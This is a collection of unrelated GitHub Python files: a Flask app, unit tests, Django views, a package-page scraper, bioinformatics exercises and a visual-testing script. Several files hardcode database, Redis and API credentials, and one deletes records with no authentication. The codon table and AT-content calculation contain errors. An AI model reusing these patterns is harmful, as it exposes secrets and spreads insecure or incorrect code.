app.config.from_object(config_object)\n register_logging(app)\n register_extensions(app)\n register_blueprints(app)\n # register_errorhandlers(app)\n # register_shellcontext(app)\n # register_commands(app)\n\n return app\n\n\ndef init_shell(app):\n @app.cli.command(\"ishell\")\n def shell():\n # lazy import these modules as they are only used in the shell context\n from IPython import embed, InteractiveShell\n import cProfile\n import pdb\n\n main = importlib.import_module(\"__main__\")\n\n banner = f\"App: poi\"\n # from .constants.models import testmodel as models\n\n ctx = main.__dict__\n ctx.update(\n {\n **testmodel.__dict__,\n \"session\": db.session,\n \"pdb\": pdb,\n \"cProfile\": cProfile,\n }\n )\n\n with app.app_context():\n ctx.update(app.make_shell_context())\n InteractiveShell.colors = \"Neutral\"\n embed(user_ns=ctx, banner2=banner)\n\n\ndef register_extensions(app):\n \"\"\"Register Flask extensions.\"\"\"\n\n # swagger.config = swagger_config\n # swagger.init_app(app)\n\n # bcrypt.init_app(app)\n # cache.init_app(app)\n\n #数据库配置\n # app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://root:pa44w0rd@1.15.59.76/MyEducationSys?charset=utf8mb4'\n app.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://cqtest:%s@106.52.100.60/test?charset=utf8mb4' % (urllib.parse.quote('Pa44w0rd!@#$'))\n app.config['SQLALCHEMY_COMMIT_ON_TEARDOWN'] = True\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\n app.config['CELERY_BROKER_URL'] = 'redis://1.15.59.76:6379/1'\n app.config['CELERY_RESULT_BACKEND'] = 'redis://1.15.59.76:6379/1'\n app.config['REDIS_URL'] = 'redis://:foo@1.15.59.76:11080/1'\n #debug 输出sql 语句\n #app.config[\"SQLALCHEMY_ECHO\"] = True\n\n db.init_app(app)\n migrate.init_app(app, db)\n init_shell(app)\n ma.init_app(app)\n redis_store.init_app(app)\n\n\n celery.conf.update(app.config)\n # csrf_protect.init_app(app)\n # login_manager.init_app(app)\n # debug_toolbar.init_app(app)\n # migrate.init_app(app, db)\n # webpack.init_app(app)\n # apidoc.init_app(app)\n\n # scheduler.init_app(app)\n #\n # scheduler.add_listener(my_listener,EVENT_ALL)\n # scheduler.add_listener(my_listener,EVENT_ALL)\n # scheduler.add_listener(my_listener,(EVENT_JOB_ADDED |\n # EVENT_JOB_REMOVED |\n # EVENT_JOB_MODIFIED |\n # EVENT_JOB_EXECUTED |\n # EVENT_JOB_ERROR |\n # EVENT_JOB_MISSED))\n\n # app, config=swagger_config\n # swagger.init_app(app)\n # swagger.config=swagger_config\n return None\n\n\nclass BadRequest(Exception):\n \"\"\"将本地错误包装成一个异常实例供抛出\"\"\"\n\n def __init__(self, message, code=400, payload=None):\n self.message = message\n self.code = code\n self.payload = payload\n\n def to_dict(self):\n return {\"code\": self.code,\n \"message\": self.message,\n \"data\": self.payload}\n\n\ndef register_errorhandlers(app):\n \"\"\"Register error handlers.\"\"\"\n\n def render_error(error):\n \"\"\"Render error templates.\"\"\"\n # If a HTTPException, pull the `code` attribute; default to 500\n import traceback\n\n error_code = getattr(error, 'code', 500)\n logger.error(traceback.format_exc())\n return render_template('{0}.html'.format(error_code)), error_code\n\n def render_error1(error):\n # return restful.params_error('required invalid! missing file')\n return render_template('{0}.html'.format(500)), 500\n\n for errcode in [401, 404, 500]:\n app.errorhandler(errcode)(render_error)\n\n # app.errorhandler(400)(handle_404_error)\n # app.errorhandler(400)(custom_abord)\n # app.register_error_handler(400,BadRequest)\n\n return None\n\n\ndef register_logging(app):\n abspath = os.path.abspath(os.path.dirname(__file__))\n fileConfig(os.path.join(abspath, './logging_config.ini'))\n\n # logger = logging.getLogger('thesis_train')\n # app.logger.setLevel(logging.DEBUG) # 日志模块等级,优先级最大\n\n\ndef register_blueprints(app):\n \"\"\"Register Flask blueprints.\"\"\"\n\n # from gptengine.views.admin import admin\n #\n # app.register_blueprint(admin)\n\n # from api.v1.resources.index import api\n # app.register_blueprint(api, url_prefix='/api/v1/index')\n\n from gptengine.api.v1 import api as api_1_0_blueprint\n app.register_blueprint(api_1_0_blueprint, url_prefix='/api/v1')\n\n # from gptengine.jobs import jobs as jobs_blueprint\n # app.register_blueprint(jobs_blueprint, url_prefix='/api/v1')\n\n # app.register_blueprint(swaggerui_blueprint, url_prefix=SWAGGER_URL)\n\n # from gptengine.api.v1 import api2 as api2_1_0_blueprint\n # app.register_blueprint(api2_1_0_blueprint, url_prefix='/api/v1')\n\n # from gptengine.user.index import admin\n # app.register_blueprint(admin)\n\n return None\n\n\napp = create_app()\n\n# api1 = Api(app) # Create a Flask-RESTPlus API\n# #\n# @api1.resource('/hello') # Create a URL route to this resource\n# class HelloWorld(Resource): # Create a RESTful resource\n# def get(self): # Create GET endpoint\n# parser = reqparse.RequestParser(bundle_errors=True)\n# parser.add_argument('model_id', type=str, location=['form', 'json'], required=True, help=\"缺少model_id\")\n# req = parser.parse_args()\n# # return {'hello': 'world'}\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\nif __name__ == \"__main__\":\n # Only for debugging while developing\n # scheduler.start()\n app.run(host='0.0.0.0', debug=DEBUG, port=FLASK_PORT)\n","repo_name":"charlessoft/docAI","sub_path":"gptengine-app/gptengine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7406,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"10039266633","text":"#!/usr/bin/env python3\n\nimport unittest\nfrom experiment import Experiment\nfrom analysis import Analysis\nfrom browser import Browser\nfrom sample import Sample\nfrom dataset import Dataset\nfrom blueprint_json_hub import get_file_type \n\nclass SimpleDatasetTestCase(unittest.TestCase):\n def setUp(self):\n experiment = 'ERX00001'\n sample_id = 'ERS00001'\n experiment_attributes = { 'experiment_type':'total-RNA-Seq', 'experiment_ontology_uri':'-', 'reference_registry_id':'IHECRE00001',\n 'assay':'RNA-Seq' }\n analysis_attributes = { 'analysis_group':'BLUEPRINT', 'alignment_software':'BWA', 'alignment_software_version':'0.7.7',\n 'analysis_software':'MACS2', 'analysis_software_version':'2.0.10.20131216' }\n type_browser_data = [ {'type':'signal','browser':{ 'primary':'true', 'big_data_url':'http://ftp.ebi.ac.uk/../.bw',\n 'md5sum':'3a468fba40d81fd7615d8dfa197f72ed'},},\n ]\n self.dataset = Dataset( experiment=experiment, sample_id=sample_id, experiment_attributes=experiment_attributes,\n analysis_attributes=analysis_attributes, type_browser_data=type_browser_data )\n def test_dataset(self):\n dataset_dict = self.dataset.get_dataset_block()\n self.assertIn('ERX00001',dataset_dict)\n \nclass SimpleExperimentTestCase(unittest.TestCase):\n\n def setUp(self):\n data = {'EXPERIMENT_TYPE':'total-RNA-Seq', 'EXPERIMENT_ONTOLOGY_URI':'-',\n 'REFERENCE_REGISTRY_ID':'IHECRE000001', 'ASSAY':'RNA-Seq', 'EXP_META':'E1'}\n self.experiment = Experiment( metadata=data )\n\n def test_exp_metadata(self):\n exp_data = self.experiment.get_experiment_data() \n self.assertEqual('total-RNA-Seq', exp_data['experiment_type']) \n\n\nclass SimpleAnalysisTestCase(unittest.TestCase):\n \n def setUp(self):\n data={ 'ANALYSIS_GROUP':'BLUEPRINT', 'ALIGNMENT_SOFTWARE':'BWA', 'ALIGNMENT_SOFTWARE_VERSION':'0.7.7', \n 'ANALYSIS_SOFTWARE':'MACS2','ANALYSIS_SOFTWARE_VERSION':'2.0.10.20131216'}\n self.analysis = Analysis( metadata=data ) \n \n def test_analysis_metadata(self):\n analysis_data = self.analysis.get_analysis_data()\n self.assertEqual('BWA', analysis_data['alignment_software'])\n\nclass SimpleBrowserTestCase(unittest.TestCase):\n def setUp(self):\n self.browser = Browser( primary='true', big_data_url='http://ftp.ebi.ac.uk/../.bw', md5sum='3a468fba40d81fd7615d8dfa197f72ed')\n \n def test_browser_metadata(self):\n browser_data = self.browser.get_browser_data()\n self.assertEqual('3a468fba40d81fd7615d8dfa197f72ed', browser_data['md5sum'])\n\nclass SimpleSampleTestCase(unittest.TestCase):\n def setUp(self):\n data = { 'DONOR_ID': 'A1', 'DONOR_AGE':'0 - 5', 'DONOR_HEALTH_STATUS':'NA', \n 'DONOR_SEX':'Female',\n 'DONOR_AGE_UNIT':'year', 'DONOR_LIFE_STAGE':'unknown', 'DONOR_ETHNICITY':'NA',\n 'SAMPLE_ONTOLOGY_URI':'http://url', 'MOLECULE':'genomic DNA', 'DISEASE':'None',\n 'BIOMATERIAL_TYPE':'Primary Cell', 'CELL_TYPE':'Monocyte' , 'CELL_LINE':'None'\n }\n self.sample = Sample( metadata=data, biomaterial_type='primary cell' )\n\n def test_sample_metadata(self):\n sample_data = self.sample.get_samples_data() \n self.assertEqual('Monocyte', sample_data['cell_type'])\n self.assertEqual('0-5', sample_data['donor_age'])\n self.assertNotIn('cell_line', sample_data)\n\nclass SimpleFileNameTypetest(unittest.TestCase):\n def test_file_name_type(self):\n plus_file_name='blueprint/data/homo_sapiens/GRCh38/venous_blood/S01H8C/effector_memory_CD8-positive_alpha-beta_T_cell_terminally_differentiated/RNA-Seq/MPIMG/S01H8C11.plusStrandMulti.star_grape2_crg.GRCh38.20160531.bw'\n (plus_type, plus_primary)=get_file_type(plus_file_name)\n self.assertEqual('signal_forward',plus_type) \n self.assertFalse(plus_primary)\n \n minus_file_name='blueprint/data/homo_sapiens/GRCh38/venous_blood/WR27/T-cell_Prolymphocytic_Leukemia/RNA-Seq/MPIMG/S016KW11.minusStrand.star_grape2_crg.GRCh38.20160531.bw'\n (minus_type, minus_primary)=get_file_type(minus_file_name)\n self.assertEqual('signal_reverse',minus_type)\n self.assertFalse(minus_primary)\n\n unstranded_file_name='blueprint/data/homo_sapiens/GRCh38/venous_blood/N00031407013221/monocyte_-_None/RNA-Seq/NCMLS/S00UFS11.signalMulti.star_grape2_crg.GRCh38.20150815.bw'\n (unstranded_type, unstranded_primary)=get_file_type(unstranded_file_name)\n self.assertEqual('signal_unstranded',unstranded_type)\n self.assertFalse(unstranded_primary)\n\n chip_bb_file_name='blueprint/data/homo_sapiens/GRCh38/venous_blood/S004JD/effector_memory_CD8-positive_alpha-beta_T_cell_terminally_differentiated/ChIP-Seq/NCMLS/S004JDH2.ERX406969.H3K36me3.bwa.GRCh38.broad.20150527.bb'\n (chip_type, chip_primary)=get_file_type(chip_bb_file_name)\n self.assertEqual('peak_calls', chip_type)\n self.assertTrue(chip_primary)\n\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"avikdatta/JSON_trackhub","sub_path":"t/test_cases.py","file_name":"test_cases.py","file_ext":"py","file_size_in_byte":5090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"21926217845","text":"# bronnen/views.py\n\n# django\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.contrib import messages\nfrom django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.views.generic import TemplateView, ListView, DetailView\nfrom django.views.generic.edit import FormView, CreateView, UpdateView, DeleteView\n\nfrom django.core.paginator import Paginator\n\n# local\nfrom .models import Bron, Betrokkene, Zaak\n#from .forms import BronForm\n\n# index view\n# classbased view \nclass indexView(TemplateView):\n \"\"\"\n Bronnen index page.\n\n **Template:**\n\n :template:`bronnen/index.html`\n \"\"\"\n template_name = \"bronnen/index.html\"\n\n def get_context_data(self,*args, **kwargs):\n context = super(indexView, self).get_context_data(*args,**kwargs)\n context['title'] = 'Zoeksysteem-Index'\n return context\n\n# all bronnen classbased\nclass all_bronnenView(ListView):\n model = Bron\n template_name = 'bronnen/all_bronnen.html'\n context_object_name = 'bronnen_list'\n paginate_by = 10\n\n def get_context_data(self, **kwargs):\n context = super(all_bronnenView, self).get_context_data(**kwargs)\n context ['title'] = 'Bronnen'\n bronnen_list = Bron.objects.all().order_by('naam')\n context ['aantal']= bronnen_list.count()\n paginator = Paginator(bronnen_list, self.paginate_by)\n page_number = self.request.GET.get('page')\n bronnen_page = paginator.get_page(page_number)\n page_count = \"a\" * bronnen_page.paginator.num_pages\n context ['page_count'] = page_count\n return context\n\n# delete bron\ndef delete_bron(request, bron_id):\n item = Bron.objects.get(id=bron_id)\n item.delete()\n return redirect('bronnen:all-bronnen')\n\n# all zaken classbased\nclass all_zakenView(ListView):\n model = Zaak\n template_name = 'bronnen/all_zaken.html'\n context_object_name = 'zaken_list'\n paginate_by = 10\n\n def get_context_data(self, **kwargs):\n context = super(all_zakenView, self).get_context_data(**kwargs)\n context ['title'] = 'Zaken'\n zaken_list = Zaak.objects.all()\n context ['aantal']= zaken_list.count()\n paginator = Paginator(zaken_list, self.paginate_by)\n page_number = self.request.GET.get('page')\n zaken_page = paginator.get_page(page_number)\n page_count = \"a\" * zaken_page.paginator.num_pages\n context ['page_count'] = page_count\n return context\n\n\n# Zoeken view\ndef zoeken(request):\n context = {}\n if request.method == \"POST\":\n betrokkene = request.POST['betrokkene']\n if betrokkene is not None:\n try:\n betrokkene_zaak = Betrokkene.objects.filter(naam__contains = betrokkene).values()[0]\n zaken_betrokkene = Zaak.objects.filter(betrokkene__naam__contains = betrokkene)\n if zaken_betrokkene:\n messages.success(request, (\"zoekopdracht uitgevoerd!\"))\n context['zaken_betrokkene'] = zaken_betrokkene\n context['betrokkene'] = betrokkene_zaak\n context['aantalzaken'] = zaken_betrokkene.count()\n context['wmozaken'] = zaken_betrokkene.filter(bron__naam__contains = 'WMO').count()\n except:\n messages.success(request, (\"geen zaken voor \" + betrokkene + \" gevonden!\"))\n return render(request, 'bronnen/zoeken.html', context)\n else:\n messages.success(request, (\"There was an error logging in. Please Try Again...\"))\n return redirect('users:login')\n else:\n context ['title'] = 'Zoeken'\n return render(request, 'bronnen/zoeken.html', context)\n","repo_name":"CasperFicke/verwerkingenregister","sub_path":"bronnen/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"3911134510","text":"import os\nimport urllib3\nimport bs4\n\n\nPARENT = 'http://download-node-02.eng.bos.redhat.com/brewroot/packages/rh-amazon-rhui-client/'\nRHEL6 = '1.el6/noarch/'\nRHEL7 = '1.el7/noarch/'\nRHEL8 = '1.el8/noarch/'\nREGION_URL = 'https://docs.aws.amazon.com/AmazonRDS/latest/UserGuide/Concepts.RegionsAndAvailabilityZones.html'\nVERSION=None\nreq = urllib3.PoolManager()\n\ndef get_latest_version():\n rpm_version = req.request('GET', PARENT)\n soup = bs4.BeautifulSoup(rpm_version.data, 'html.parser')\n latest = soup.find_all(\"a\")[-5].text\n print('Getting latest rpm version: ' + latest.split()[0])\n global VERSION\n VERSION=latest\n\ndef get_rhel6_rpms():\n if not VERSION:\n get_latest_version()\n rhel6_rpms = []\n rpm_page = req.request('GET', PARENT + VERSION + RHEL6)\n soup = bs4.BeautifulSoup(rpm_page.data, 'html.parser')\n endpoints = soup.find_all(\"a\")[5:-5]\n for link in endpoints:\n rhel6_rpms.append(link.text)\n print('RHEL6 RPMs to download: ')\n for rpm in rhel6_rpms:\n print(rpm)\n return rhel6_rpms\n\ndef get_rhel7_rpms():\n if not VERSION:\n get_latest_version()\n rhel7_rpms = []\n rpm_page = req.request('GET', PARENT + VERSION + RHEL7)\n soup = bs4.BeautifulSoup(rpm_page.data, 'html.parser')\n endpoints = soup.find_all(\"a\")[5:-5]\n for link in endpoints:\n rhel7_rpms.append(link.text)\n print('RHEL7 RPMs to download: ')\n for rpm in rhel7_rpms:\n print(rpm)\n return rhel7_rpms\n\ndef get_rhel8_rpms():\n if not VERSION:\n get_latest_version()\n rhel8_rpms = []\n rpm_page = req.request('GET', PARENT + VERSION + RHEL8)\n soup = bs4.BeautifulSoup(rpm_page.data, 'html.parser')\n endpoints = soup.find_all(\"a\")[5:-5]\n for link in endpoints:\n rhel8_rpms.append(link.text)\n print('RHEL8 RPMs to download: ')\n for rpm in rhel8_rpms:\n print(rpm)\n return rhel8_rpms\n\ndef get_regions():\n regions = []\n region_page = req.request('GET', REGION_URL)\n soup = bs4.BeautifulSoup(region_page.data, 'html.parser')\n td = 1\n while td < len(soup.table('td')):\n regions.append(soup.table('td')[td].text)\n td+=4\n return regions\n\n'''\nNeed to find a place to scrape archs and release versions\nHard coding for now\n'''\n\nif __name__ == \"__main__\":\n print(get_latest_version())\n print(get_rhel6_rpms())\n print(get_rhel7_rpms())\n print(get_rhel8_rpms())\n print(get_regions())","repo_name":"taftsanders/aws_rhui_package_validator","sub_path":"get_links.py","file_name":"get_links.py","file_ext":"py","file_size_in_byte":2434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"1051758745","text":"my_dna = 'ACTGATCGATTACGTATAGTATTTGCTATCATACATATATATCGATGCGTTCAT'\ntmp1 = my_dna.replace('A', 'X')\ntmp2 = tmp1.replace('T', 'A')\ntmp3 = tmp2.replace('X', 'T')\ntmp4 = tmp3.replace('C', 'X')\ntmp5 = tmp4.replace('G', 'C')\ncomplement_dna = tmp5.replace('X','G')\n\nprint(my_dna)\nprint(complement_dna)\n\nrna = complement_dna.replace('T','U')\nprint(rna)\n\nAATable = {\n\t\"UUU\":'F',\"UUC\":'F',\"UUA\":'L',\"UUG\":'L',\"UCU\":'S',\"UCC\":'S',\"UCA\":'S',\"UCG\":'S',\n\t\"UAU\":'S',\"UAC\":'Y',\"UAA\":'Stop',\"UAG\":'Stop',\"UGU\":'C',\"UGC\":'C',\"UGA\":'Stop',\"UGG\":'W',\n\t\"CUU\":'L',\"CUC\":'L',\"CUA\":'L',\"CUG\":'L',\"CCU\":'P',\"CCC\":'P',\"CCA\":'P',\"CCG\":'P',\n\t\"CAU\":'H',\"CAC\":'H',\"CAA\":'Q',\"CAG\":'Q',\"CGU\":'R',\"CGC\":'R',\"CGA\":'R',\"CGG\":'R',\n\t\"AUU\":'I',\"AUC\":'I',\"AUA\":'I',\"AUG\":'M',\"ACU\":'I',\"ACC\":'I',\"ACA\":'I',\"ACG\":'M',\n\t\"AAU\":'N',\"AAC\":'N',\"AAA\":'K',\"AAG\":'K',\"AGU\":'S',\"AGC\":'S',\"AGA\":'R',\"AGG\":'R',\n\t\"GUU\":'V',\"GUC\":'V',\"GUA\":'V',\"GUG\":'V',\"GCU\":'V',\"GCC\":'V',\"GCA\":'V',\"GCG\":'V',\n\t\"GAU\":'D',\"GAC\":'D',\"GAA\":'E',\"GAG\":'E',\"GGU\":'G',\"GGC\":'G',\"GGA\":'G',\"GGG\":'G',\n}\n\n#CALCULATING AT CONTENT\n\n#Here's a short DNA sequence:\n\n#ACTGATCGATTACGTATAGTATTTGCTATCATACATATATATCGATGCGTTCAT\n\n'''# ? Write a program that will print out the AT content of this DNA sequence (i.e. the proportion of bases that are either A or T).Hint: you can use normal mathematical symbols like add (+), subtract (-), multiply (*), divide (/) and parentheses to carry out calculations on numbers in Python.'''\n\nmy_string = 'ACTGATCGATTACGTATAGTATTTGCTATCATACATATATATCGATGCGTTCAT'\n\nnA = my_string.count('A')\nnC = my_string.count('C')\nnG = my_string.count('G')\nnT = my_string.count('T')\n\nresult = nA+nT/len(my_string)\nprint(result)\n\n\n\n#RESTRICTION FRAGMENT LENGTHS\n\n#Here's a short DNA sequence:\n\n#ACTGATCGATTACGTATAGTAGAATTCTATCATACATATATATCGATGCGTTCAT\n\n# ! The sequence contains a recognition site for the EcoRI restriction enzyme, which cuts at the motif G*AATTC (the position of the cut is indicated by an asterisk). \n#? Write a program which will calculate the size of the two fragments that will be produced when the DNA sequence is digested with EcoRI.\n\nmy_string = 'ACTGATCGATTACGTATAGTAGAATTCTATCATACATATATATCGATGCGTTCAT'\n\nfirst_len = 1+ my_string.find('GAATTC') \n\nsecond_len = len(my_string) - first_len\n\n\nprint(first_len) #22\nprint(second_len) #33\n\n\n\n###\n#SPLICING OUT INTRONS, PART ONE\n\n#Here's a short section of genomic DNA:\n\n#* DNA = ATCGATCGATCGATCGACTGACTAGTCATAGCTATGCATGTAGCTACTCGATCGATCGATCGATCGATCGATCGATCGATCGATCATGCTATCATCGATCGATATCGATGCATCGACTACTAT\n\n#It comprises two exons and an intron. The first exon runs from the start of the sequence to base number 63 (starting counting from zero),\n# and the second exon runs from base 91 (also counting from zero) to the end of the sequence. Write a program that will print just the coding regions of the DNA sequence.\n\n\nmy_string = 'ATCGATCGATCGATCGACTGACTAGTCATAGCTATGCATGTAGCTACTCGATCGATCGATCGATCGATCGATCGATCGATCGATCATGCTATCATCGATCGATATCGATGCATCGACTACTAT'\n\nresult = my_string[0:63] + my_string[91:] #should be 90 instead of 91.\n\n# ! SPLICING OUT INTRONS, PART TWO\n\n#? Using the data from part one, write a program that will calculate what percentage of the DNA sequence is coding.\n\nmy_string = 'ATCGATCGATCGATCGACTGACTAGTCATAGCTATGCATGTAGCTACTCGATCGATCGATCGATCGATCGATCGATCGATCGATCATGCTATCATCGATCGATATCGATGCATCGACTACTAT'\n\n\ncoding = my_string[0:63] + my_string[91:]\n\nresult = len(coding)/len(my_string)\n\nprint(result)\n\n\n#SPLICING OUT INTRONS, PART THREE\n\n#Using the data from part one, write a program that will print out the original genomic \n#DNA sequence with coding bases in uppercase and non-coding bases in lowercase.\n\nmy_string[64:90]\n\nresult = my_string[0:63] + my_string[64:90].lower() + my_string[91:] #should be [63:90] and [90:]\n\nprint(result)","repo_name":"kasunicts48/bioInformatics","sub_path":"Q3.py","file_name":"Q3.py","file_ext":"py","file_size_in_byte":3747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"35065261998","text":"class Solution(object):\n def wordBreak(self, s, wordDict):\n \"\"\"\n :type s: str\n :type wordDict: List[str]\n :rtype: List[str]\n \"\"\"\n res = self.dfs(s, wordDict, {})\n # print(res)\n return res\n\n def dfs(self, s, wordDict, map):\n if s in map:\n return map[s]\n res = []\n if s == '':\n res.append('')\n return res\n for word in wordDict:\n if s.startswith(word):\n sublist = self.dfs(s[len(word):], wordDict, map)\n for sub in sublist:\n if sub == '':\n res.append(word + '' + sub)\n else:\n res.append(word + ' ' + sub)\n\n map[s] = res\n return res \n\n\n# string = \"catsanddog\"\n# wordDict = [\"cat\", \"cats\", \"and\", \"sand\", \"dog\"]\n# s = Solution()\n# res = s.wordBreak(string, wordDict)\n\n# string = \"pineapplepenapple\"\n# wordDict = [\"apple\",\"pen\",\"applepen\",\"pine\",\"pineapple\"]\n# s = Solution()\n# res = s.wordBreak(string, wordDict)","repo_name":"TalentBoy2333/practice","sub_path":"LeetCode/140-Word Break II/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"23930090302","text":"# -*- coding: utf-8 -*-\n\nfrom mock import MagicMock, patch\n\nfrom makeyfile.runners.command import CommandRunner\n\n\ndef test_runners_comand_call():\n runner = CommandRunner('x')\n\n def _cb(command, *args):\n assert command == \"bar\"\n assert args == (2, 3)\n return 23\n\n result = runner(_cb, \"bar\", 1, 2, 3)\n assert result == 23\n\n\ndef test_runners_comand_parse_module():\n runner = CommandRunner('x')\n assert runner.parse_module(\"foo.bar\") == \"foo.bar\"\n assert runner.parse_module(\"foo7.bar23\") == \"foo7.bar23\"\n\n\ndef test_runners_comand_parse_callable():\n runner = CommandRunner('x')\n assert runner.parse_callable(\"foo.bar\") == \"Command\"\n assert runner.parse_callable(\"foo7.bar23\") == \"Command\"\n\n\ndef test_runners_comand_resolve():\n runner = CommandRunner('x')\n\n with patch(\"makeyfile.runners.command.PythonRunner.resolve\") as m:\n command_m = MagicMock(return_value=23)\n m.return_value = command_m\n result = runner.resolve(\"foo\")\n assert result == 23\n assert m.call_args[0] == (\"foo\", )\n assert command_m.call_args[0] == ('x', )\n","repo_name":"translate/makeyfile","sub_path":"tests/runners/command.py","file_name":"command.py","file_ext":"py","file_size_in_byte":1119,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"18350890421","text":"from webdriver_manager.chrome import ChromeDriverManager\r\nfrom selenium.webdriver import Chrome\r\nimport os\r\n\r\n\r\nfrom applitools.selenium import (\r\n logger,\r\n VisualGridRunner,\r\n Eyes,\r\n Target,\r\n BatchInfo,\r\n BrowserType,\r\n DeviceName,\r\n)\r\n\r\n\r\ndef set_up(eyes):\r\n\r\n eyes.configure.set_api_key(\"VpEXwHtKENoxwxc7njHv2AJVzJp4Lqt8uGsr103Etp4Ss110\")\r\n\r\n\r\n eyes.configure.set_batch(BatchInfo(\"flaticon\"))\r\n\r\n (\r\n eyes.configure.add_browser(800, 600, BrowserType.CHROME)\r\n .add_browser(700, 500, BrowserType.FIREFOX)\r\n .add_browser(1600, 1200, BrowserType.IE_11)\r\n .add_browser(1024, 768, BrowserType.EDGE_CHROMIUM)\r\n .add_browser(800, 600, BrowserType.SAFARI)\r\n .add_device_emulation(DeviceName.iPhone_X)\r\n .add_device_emulation(DeviceName.Pixel_2)\r\n )\r\n\r\n\r\ndef ultra_fast_test(web_driver, eyes):\r\n try:\r\n\r\n web_driver.get(\"https://odore.ml/\")\r\n\r\n eyes.open(\r\n web_driver, \"register\", \"main2\", {\"width\": 800, \"height\": 600}\r\n )\r\n\r\n # check the login page with fluent api, see more info here\r\n # https://applitools.com/docs/topics/sdk/the-eyes-sdk-check-fluent-api.html\r\n eyes.check(\"\", Target.window().fully().with_name(\"main page\"))\r\n\r\n web_driver.find_element_by_name(\"Sign in\").click #find_element_by_id(\"Sign in\").click()\r\n\r\n # Check the app page\r\n eyes.check(\"\", Target.window().fully().with_name(\"App page\"))\r\n\r\n # Call Close on eyes to let the server know it should display the results\r\n eyes.close_async()\r\n except Exception as e:\r\n eyes.abort_async()\r\n print(e)\r\n\r\n\r\ndef tear_down(web_driver, runner):\r\n # Close the browser\r\n web_driver.quit()\r\n\r\n # we pass false to this method to suppress the exception that is thrown if we\r\n # find visual differences\r\n all_test_results = runner.get_all_test_results(False)\r\n print(all_test_results)\r\n\r\n\r\n# Create a new chrome web driver\r\nweb_driver = Chrome(ChromeDriverManager().install())\r\n\r\n# Create a runner with concurrency of 1\r\nrunner = VisualGridRunner(1)\r\n\r\n# Create Eyes object with the runner, meaning it'll be a Visual Grid eyes.\r\neyes = Eyes(runner)\r\n\r\nset_up(eyes)\r\n\r\ntry:\r\n # ⭐️ Note to see visual bugs, run the test using the above URL for the 1st run.\r\n # but then change the above URL to https://id.freepikcompany.com/login?client_id=flaticon\r\n # (for the 2nd run)\r\n ultra_fast_test(web_driver, eyes)\r\nfinally:\r\n tear_down(web_driver, runner)","repo_name":"shardvova/shard","sub_path":"path.py","file_name":"path.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"11063346860","text":"###Task 1: WAP to create a function which returns the sum of all the element provided to it as an arguement. The arguement list will be dynamic.#####\nprint (\"task 1 started\")\ndef listsum(total, *args):\n for i in range(0, len(args)):\n total = total + args[i]\n print(total)\ntotal = 0\nnumber = input(\"Enter the number with space\")\nnumber = number.split()\nfor i in range(len(number)):\n number[i] = float(number[i])\n\nlistsum(total, *number)\n\n###TASK DAY 02 ####\ndef myFun(**kwargs):\n ret =0 \n count =0 \n maximum =0 \n string=\"\"\n failed = \"\"\n for k , j in kwargs.items():\n count +=1\n ret = ret + j\n if j > maximum:\n maximum =j\n string = k\n if j < 33: \n failed = k\n print(\"teh average marks is \",ret/count)\n print (\"the failed marks is 33\")\n print (\"the failed students are\", failed)\n print(\"%s = %s\" %(string, maximum))\n #print(stri)\nmyFun(rahul =80, aman =95, palak=45, anmol =60 , hi= 12) \n\n#####https://github.com/LetusDevops/LearnPython/tree/main/day2 task3 ###\na_dict = [\n {\n \"name\": \"gara\",\n \"power\": \"some sand related jutsu\",\n \"powerlevel\": 199,\n \"frieds\": [\n {\n \"name\": \"Naruto\",\n \"friend_points\": 28,\n \"enemies\": [\"Saitama\"] \n },\n {\n \"name\": \"Boruto\",\n \"friend_points\": 18,\n \"enemies\": [\"Saitama\"]\n }\n ]\n },\n {\n \"name\": \"Alex\",\n \"power\": \"some titans powers\",\n \"powerlevel\": 1199,\n \"frieds\": [\n {\n \"name\": \"Soniya\",\n \"friend_points\": 128,\n \"enemies\": [\"Saitama\"] \n }\n ]\n },\n {\n \"name\": \"King\",\n \"power\": \"some titans powers\",\n \"powerlevel\": 1199,\n \"frieds\": [\n {\n \"name\": \"Saitama\",\n \"friend_points\": 128,\n \"enemies\": [\"Naruto\", \"gara\", \"boruto\"] \n }\n ]\n }\n \n] \n# Iterating over keys\nfor i in a_dict:\n print(i['name'] , i['power'], i ['powerlevel'], i['frieds'][0]['name'], i['frieds'][0]['friend_points'], i['frieds'][0]['enemies'][0], i['frieds'][0]['name'])\n\n\n\n\n\n\n","repo_name":"navnitDevOps/python","sub_path":"python_Day_02.py","file_name":"python_Day_02.py","file_ext":"py","file_size_in_byte":2253,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"17344591097","text":"import hashlib\n\nimport torch\n\n\nclass UnNormalize(object):\n def __init__(self, mean, std):\n self.mean = mean\n self.std = std\n\n def __call__(self, tensor):\n \"\"\"\n Args:\n tensor (Tensor): Tensor image of size (C, H, W) to be normalized.\n Returns:\n Tensor: Normalized image.\n \"\"\"\n for t, m, s in zip(tensor, self.mean, self.std):\n t.mul_(s).add_(m)\n # The normalize code -> t.sub_(m).div_(s)\n return tensor\n\n\ndef tensor_hash(tensor):\n tensor = tensor.detach().cpu().numpy().tobytes()\n return hashlib.sha256(tensor).hexdigest()\n\ndef yield_batches(images, batch_size):\n 